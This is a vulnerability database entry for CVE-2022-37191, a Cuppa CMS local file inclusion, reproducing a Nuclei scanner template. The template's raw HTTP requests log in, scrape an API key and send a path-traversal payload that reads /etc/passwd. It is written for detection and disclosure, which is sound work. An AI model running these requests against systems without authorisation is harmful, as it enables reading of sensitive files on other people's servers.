Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-37191
HistoryApr 21, 2023 - 8:56 a.m.

Cuppa CMS v1.0 - Authenticated Local File Inclusion

2023-04-2108:56:01
ProjectDiscovery
github.com
3
cve
lfi
cuppa
authenticated
cuppacms
data leakage
remote execution

6.5 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

0.252 Low

EPSS

Percentile

96.7%

The component "cuppa/api/index.php" of CuppaCMS v1.0 is Vulnerable to LFI. An authenticated user can read system files via crafted POST request using [function] parameter value as LFI payload.
id: CVE-2022-37191

info:
  name: Cuppa CMS v1.0 - Authenticated Local File Inclusion
  author: theamanrawat
  severity: medium
  description: |
    The component "cuppa/api/index.php" of CuppaCMS v1.0 is Vulnerable to LFI. An authenticated user can read system files via crafted POST request using [function] parameter value as LFI payload.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, potential data leakage, and remote code execution.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the authenticated local file inclusion vulnerability in Cuppa CMS v1.0.
  reference:
    - https://github.com/CuppaCMS/CuppaCMS
    - https://nvd.nist.gov/vuln/detail/CVE-2022-37191
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2022-37191
    cwe-id: CWE-829
    epss-score: 0.39013
    epss-percentile: 0.97239
    cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: cuppacms
    product: cuppacms
  tags: cve,cve2022,lfi,cuppa,authenticated,cuppacms

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user={{username}}&password={{password}}&language=en&task=login
      - |
        POST /components/table_manager/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        path=component%2Ftable_manager%2Fview%2Fcu_api_keys
      - |
        POST /api/index.php HTTP/1.1
        Host: {{Hostname}}
        key: {{apikey}}
        Content-Type: application/x-www-form-urlencoded

        function=./../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd/

    matchers-condition: and
    matchers:
      - type: word
        part: header_3
        words:
          - "text/html"

      - type: regex
        part: body_3
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: apikey
        group: 1
        regex:
          - "<td class='td_key'>(.*?)</td>"
        internal: true
# digest: 4b0a00483046022100cae18f2ffd9be2e5df03f091e999ccf122f68ce2e747456dd21b052830e69f64022100e2ce5e294007b7c6ab3e761ac0acccef20ae745dd2571e9d11608cf2ba778dd2:922c64590222798bb761d5b6d8e72950

6.5 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

0.252 Low

EPSS

Percentile

96.7%

Related for NUCLEI:CVE-2022-37191